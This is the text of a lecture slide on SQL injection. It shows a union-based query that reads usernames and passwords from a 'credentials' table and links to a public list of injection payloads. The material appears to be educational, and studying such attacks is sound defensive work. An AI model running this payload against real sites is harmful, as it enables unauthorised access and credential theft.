Slide 16
Slide 16 text
SQL injection
Into something that select other table, that store more
sensitive information like this
16
select * from news where news_id=5 union select
1,2,concat(username,0x3a,password),4,5 from
credentials
This is only one variant of the sql injection from the 9 variant
of sql injection with more than 100 sql injection payload, you
can see full in here
https://github.com/payloadbox/sql-injection-payload-list